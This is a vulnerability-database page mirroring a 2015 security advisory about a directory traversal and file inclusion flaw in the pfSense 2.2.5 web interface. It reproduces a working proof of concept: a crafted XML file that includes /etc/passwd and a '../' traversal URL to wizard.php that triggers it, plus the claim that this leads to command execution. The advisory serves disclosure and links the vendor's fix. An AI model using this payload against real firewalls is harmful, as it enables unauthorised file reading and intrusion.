Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PFSense 2.2.5 Directory Traversal

🗓️ 18 Dec 2015 00:00:00Reported by R-73eNType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

PFSense 2.2.5 Directory Traversal vulnerability allows file inclusion attack via wizard.php and pkg.php, leading to command execution

Code
`# Title : PFSense <= 2.2.5 Directory Traversal  
# Date : 18/12/2015  
# Author : R-73eN  
# Tested on : PFSense 2.2.5  
# Software : https://github.com/pfsense/pfsense  
# Vendor : https://pfsense.org/  
# ___ __ ____ _ _   
# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |   
# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |   
# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___   
# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|  
#  
#  
# Fix provided by the vendor https://github.com/pfsense/pfsense/commit/3ac0284805ce357552c3ccaeff0a9aadd0c6ea13  
#  
#  
  
  
In pfsense <= 2.2.5 (Latest Version) , during a security audit i discovered the following vulnerabilities in the pfsense Webgui.  
  
The following files are vulnerable to a file inclusion attack  
  
wizard.php?xml=  
pkg.php?xml=  
  
Both of this files do not sanitize the path of the xml parameter and we can load xml files, and loading a special crafted xml file we can gain command execution.  
  
Example:  
1.xml (the filename can be whatever .txt , .jpg etc because it does not check for the file extension)  
  
The content of the 1.xml should be:  
  
<?xml version="1.0" encoding="utf-8" ?>  
<pfsensewizard>  
<totalsteps>12</totalsteps>  
<step>  
<id>1</id>  
<title>LFI example </title>  
<description>Lfi example </description>  
<disableheader>on</disableheader>  
<stepsubmitphpaction>step1_submitphpaction();</stepsubmitphpaction>  
<includefile>/etc/passwd</includefile>  
</step>  
</pfsensewizard>  
  
the parameter <includefile> is passed to a require_once() function which triggers the File inclusion Attack.  
As we all know File inclusion attack can be converted to RCE very easily.  
  
Then visiting  
  
http://vulnhost/wizard.php?xml=../../../1.xml  
  
where the "xml" parameter is the path of the crafted file, will trigger the vulnerability.  
  
Thanks  
Rio Sherri  
https://www.infogen.al/ - Infogen AL  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Dec 2015 00:00Current
0.3Low risk
Vulners AI Score0.3
pfsense 2.2.5directory traversalfile inclusioncommand executionsecurity auditwebguixml parameterpath sanitizationvulnerabilityrce
24